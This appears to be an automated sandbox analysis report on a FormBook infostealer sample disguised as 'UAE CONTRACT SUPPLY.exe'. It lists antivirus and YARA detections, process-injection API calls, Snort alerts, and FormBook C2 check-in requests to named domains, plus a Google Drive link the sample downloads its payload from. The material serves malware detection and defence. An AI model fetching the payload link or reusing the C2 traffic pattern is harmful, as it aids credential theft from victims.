Analysis Report UAE CONTRACT SUPPLY.exe

AV Detection:

Multi AV Scanner detection for submitted file

Source: UAE CONTRACT SUPPLY.exe	Virustotal: Detection: 33%			Perma Link
Source: UAE CONTRACT SUPPLY.exe	ReversingLabs: Detection: 36%

Yara detected FormBook

Source: Yara match	File source: 00000010.00000002.631455625.0000000000F70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.514645997.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.519570188.000000001E270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.631815721.00000000011C0000.00000004.00000001.sdmp, type: MEMORY

Antivirus or Machine Learning detection for unpacked file

Source: 16.2.chkdsk.exe.5bc7960.5.unpack	Avira: Label: TR/Dropper.Gen
Source: 16.2.chkdsk.exe.fd4f08.1.unpack	Avira: Label: TR/Dropper.Gen

Compliance:

Uses 32bit PE files

Source: UAE CONTRACT SUPPLY.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Uses secure TLS version for HTTPS connections

Source: unknown

HTTPS traffic detected: 142.250.184.65:443 -> 192.168.2.6:49731 version: TLS 1.2

Binary contains paths to debug symbols

Source:	Binary string: chkdsk.pdbGCTL source: UAE CONTRACT SUPPLY.exe, 00000003.00000002.514667556.00000000000B0000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 0000000D.00000000.498357108.00000000075A0000.00000002.00000001.sdmp
Source:	Binary string: chkdsk.pdb source: UAE CONTRACT SUPPLY.exe, 00000003.00000002.514667556.00000000000B0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: UAE CONTRACT SUPPLY.exe, 00000003.00000002.519848532.000000001E5BF000.00000040.00000001.sdmp, chkdsk.exe, 00000010.00000002.632699169.00000000057AF000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: UAE CONTRACT SUPPLY.exe, chkdsk.exe
Source:	Binary string: wscui.pdb source: explorer.exe, 0000000D.00000000.498357108.00000000075A0000.00000002.00000001.sdmp

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4x nop then pop esi		16_2_00CF581F
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4x nop then pop ebx		16_2_00CE6A9D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4x nop then pop edi		16_2_00CF62AB
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4x nop then pop edi		16_2_00CEC3CC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4x nop then pop edi		16_2_00CEC358

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 104.21.32.11:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 104.21.32.11:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 104.21.32.11:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49756 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49756 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49756 -> 34.102.136.180:80

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /w25t/?7nf0kP=UE8df8CjPA42HhSGpHRvEFW0E1qwQi3qh9I+J2DwYVAPWlwUU9Jt0Xern2mXQMt791bHr0Uusg==&wj=hBZ8sVLxwZopBdRp HTTP/1.1Host: www.aserchofalltrades.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /w25t/?7nf0kP=Uq0CzCwvS6YoWMp/UCKN7JIAByS11Z6E5aUOsXAJZj+0yJL9Nk5m9Qz8CvCcNaQrIL6Vs/Uw3Q==&wj=hBZ8sVLxwZopBdRp HTTP/1.1Host: www.parentseducationalco-op.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /w25t/?7nf0kP=x6qnXySIKpUJn5XerhvX+0EMzo20pmQQj9ePwr3K6ImaWCKGjDlnwZkCLhxG6Ruvc228xc+5mw==&wj=hBZ8sVLxwZopBdRp HTTP/1.1Host: www.allsalesvinyl.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /w25t/?wj=hBZ8sVLxwZopBdRp&7nf0kP=15PPGsvA0OesMgSYtNkzWMXd9CXxAPrih7Pi9b51HvfmowsB4G7YJFhsDDlnN8h0byCLDSw3/g== HTTP/1.1Host: www.pardsoda.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /w25t/?wj=hBZ8sVLxwZopBdRp&7nf0kP=SQSlpqwSeyxeA2HWARjbLzFChTkDZ06wC9CS935ywhThxAQMIzjb51bRjEk1pH3EnhYaWQ8xDg== HTTP/1.1Host: www.sixteen3handscottages.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 34.102.136.180 34.102.136.180

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WIX_COMIL WIX_COMIL

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Downloads files from webservers via HTTP

Source: global traffic	HTTP traffic detected: GET /w25t/?7nf0kP=UE8df8CjPA42HhSGpHRvEFW0E1qwQi3qh9I+J2DwYVAPWlwUU9Jt0Xern2mXQMt791bHr0Uusg==&wj=hBZ8sVLxwZopBdRp HTTP/1.1Host: www.aserchofalltrades.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /w25t/?7nf0kP=Uq0CzCwvS6YoWMp/UCKN7JIAByS11Z6E5aUOsXAJZj+0yJL9Nk5m9Qz8CvCcNaQrIL6Vs/Uw3Q==&wj=hBZ8sVLxwZopBdRp HTTP/1.1Host: www.parentseducationalco-op.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /w25t/?7nf0kP=x6qnXySIKpUJn5XerhvX+0EMzo20pmQQj9ePwr3K6ImaWCKGjDlnwZkCLhxG6Ruvc228xc+5mw==&wj=hBZ8sVLxwZopBdRp HTTP/1.1Host: www.allsalesvinyl.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /w25t/?wj=hBZ8sVLxwZopBdRp&7nf0kP=15PPGsvA0OesMgSYtNkzWMXd9CXxAPrih7Pi9b51HvfmowsB4G7YJFhsDDlnN8h0byCLDSw3/g== HTTP/1.1Host: www.pardsoda.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /w25t/?wj=hBZ8sVLxwZopBdRp&7nf0kP=SQSlpqwSeyxeA2HWARjbLzFChTkDZ06wC9CS935ywhThxAQMIzjb51bRjEk1pH3EnhYaWQ8xDg== HTTP/1.1Host: www.sixteen3handscottages.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: doc-08-78-docs.googleusercontent.com

Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Feb 2021 14:28:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closex-wix-request-id: 1614263295.2061857739024538739vary: Accept-EncodingAge: 0X-Seen-By: jeslxIFvDH4ulYwNNi+3Muwfbs+7qUVAqsIx00yI78k=,sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVgAmI6NXu6WfqLI/M7f8tcV,2d58ifebGbosy5xc+FRaljJhPW/QGfx+q8yY6tJt4liplW2KIFCnP2WuDwYfqFs95giHFpZ7ywPurTQjYl2cGQ==,2UNV7KOq4oGjA5+PKsX47Ay/vVeTGg75VNBOw8znOgAfbJaKSXYQ/lskq2jK6SGP,m0j2EEknGIVUW/liY8BLLsk16xozuw6nSXf6CEzK6Aca0sM5c8dDUFHeNaFq0qDu,JLaio/7uvfP647F5CQsGZbrBoTckX0poWZhq63wruFRGp/J3MBzgzU8QHrQuh4zQ,9phxMuSXVGy04obH0oEnZZDXl7I7ILTyJojtezEQxYM0d1JjSaSBjnO+SH73qBkvWIHlCalF7YnfvOr2cMPpyw==Server: Pepyaka/1.15.10Data Raw: 62 39 33 0d 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 77 69 78 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 20 20 3c 6c 69 6e 6b 20 68 72 65 66 Data Ascii: b93 <!-- --><!doctype html><!-- --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <meta name="robots" content="noindex, nofollo

Urls found in memory or binary data

Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 0000000D.00000002.631792237.000000000095C000.00000004.00000020.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 0000000D.00000000.500792305.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: UAE CONTRACT SUPPLY.exe	String found in binary or memory: https://drive.google.com/uc?export=download&id=1tH9Kn1AiB6JALzFxr9xEwyDe2gfOw8eq

Uses HTTPS

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443

Uses secure TLS version for HTTPS connections

Source: unknown

HTTPS traffic detected: 142.250.184.65:443 -> 192.168.2.6:49731 version: TLS 1.2

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 00000010.00000002.631455625.0000000000F70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.514645997.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.519570188.000000001E270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.631815721.00000000011C0000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000010.00000002.633691017.0000000005BC7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000010.00000002.631455625.0000000000F70000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.631455625.0000000000F70000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.514645997.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.514645997.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.519570188.000000001E270000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.519570188.000000001E270000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.631687849.0000000000FD4000.00000004.00000020.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000010.00000002.631815721.00000000011C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.631815721.00000000011C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Contains functionality to call native functions

Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_02266266 NtResumeThread,		1_2_02266266
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_0226054E EnumWindows,NtSetInformationThread,		1_2_0226054E
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_02262592 NtWriteVirtualMemory,		1_2_02262592
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_02265DCB NtProtectVirtualMemory,		1_2_02265DCB
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_02266629 NtResumeThread,		1_2_02266629
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_02260636 NtSetInformationThread,		1_2_02260636
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_0226263A NtWriteVirtualMemory,		1_2_0226263A
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_02263606 NtSetInformationThread,LoadLibraryA,		1_2_02263606
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_0226626E NtResumeThread,		1_2_0226626E
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_0226066A NtSetInformationThread,		1_2_0226066A
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_02262644 NtWriteVirtualMemory,		1_2_02262644
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_0226065C NtSetInformationThread,		1_2_0226065C
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_022606A9 NtSetInformationThread,		1_2_022606A9
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_02260682 NtSetInformationThread,		1_2_02260682
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_02260690 NtSetInformationThread,		1_2_02260690
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_0226629C NtResumeThread,		1_2_0226629C
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_02262698 NtWriteVirtualMemory,		1_2_02262698
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_022606EA NtSetInformationThread,		1_2_022606EA
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_022662EA NtResumeThread,		1_2_022662EA
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_022626FD NtWriteVirtualMemory,		1_2_022626FD
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_022662C5 NtResumeThread,		1_2_022662C5
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_022652C8 NtSetInformationThread,		1_2_022652C8
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_02266335 NtResumeThread,		1_2_02266335
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_02262764 NtWriteVirtualMemory,		1_2_02262764
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_022663A0 NtResumeThread,		1_2_022663A0
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_022663AA NtResumeThread,		1_2_022663AA
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_022663F8 NtResumeThread,		1_2_022663F8
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_022627DA NtWriteVirtualMemory,		1_2_022627DA
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_0226283B NtWriteVirtualMemory,		1_2_0226283B
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_0226641E NtResumeThread,		1_2_0226641E
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_02265040 NtSetInformationThread,		1_2_02265040
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_02266455 NtResumeThread,		1_2_02266455
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_022664A4 NtResumeThread,		1_2_022664A4
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_022628BC NtWriteVirtualMemory,		1_2_022628BC
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_022664FB NtResumeThread,		1_2_022664FB
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_02266566 NtResumeThread,		1_2_02266566
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_02262942 NtWriteVirtualMemory,		1_2_02262942
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_022629BD NtWriteVirtualMemory,		1_2_022629BD
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_022625E5 NtWriteVirtualMemory,		1_2_022625E5
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_022605D4 NtSetInformationThread,		1_2_022605D4
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 1_2_022605D0 NtSetInformationThread,		1_2_022605D0
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E509660 NtAllocateVirtualMemory,LdrInitializeThunk,		3_2_1E509660
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E5096E0 NtFreeVirtualMemory,LdrInitializeThunk,		3_2_1E5096E0
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E509710 NtQueryInformationToken,LdrInitializeThunk,		3_2_1E509710
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E509FE0 NtCreateMutant,LdrInitializeThunk,		3_2_1E509FE0
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E509780 NtMapViewOfSection,LdrInitializeThunk,		3_2_1E509780
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E5097A0 NtUnmapViewOfSection,LdrInitializeThunk,		3_2_1E5097A0
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E509540 NtReadFile,LdrInitializeThunk,		3_2_1E509540
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E509A50 NtCreateFile,LdrInitializeThunk,		3_2_1E509A50
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E509A00 NtProtectVirtualMemory,LdrInitializeThunk,		3_2_1E509A00
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E509A20 NtResumeThread,LdrInitializeThunk,		3_2_1E509A20
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E509840 NtDelayExecution,LdrInitializeThunk,		3_2_1E509840
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E509860 NtQuerySystemInformation,LdrInitializeThunk,		3_2_1E509860
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E5098F0 NtReadVirtualMemory,LdrInitializeThunk,		3_2_1E5098F0
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E509910 NtAdjustPrivilegesToken,LdrInitializeThunk,		3_2_1E509910
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E5099A0 NtCreateSection,LdrInitializeThunk,		3_2_1E5099A0
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E509650 NtQueryValueKey,		3_2_1E509650
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E509670 NtQueryInformationProcess,		3_2_1E509670
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E509610 NtEnumerateValueKey,		3_2_1E509610
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E5096D0 NtCreateKey,		3_2_1E5096D0
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E50A770 NtOpenThread,		3_2_1E50A770
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E509770 NtSetInformationFile,		3_2_1E509770
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E509760 NtOpenProcess,		3_2_1E509760
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E50A710 NtOpenProcessToken,		3_2_1E50A710
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E509730 NtQueryVirtualMemory,		3_2_1E509730
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E509560 NtWriteFile,		3_2_1E509560
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E50AD30 NtSetContextThread,		3_2_1E50AD30
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E509520 NtWaitForSingleObject,		3_2_1E509520
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E5095D0 NtClose,		3_2_1E5095D0
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E5095F0 NtQueryInformationFile,		3_2_1E5095F0
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E509A10 NtQuerySection,		3_2_1E509A10
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E509A80 NtOpenDirectoryObject,		3_2_1E509A80
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E509B00 NtSetValueKey,		3_2_1E509B00
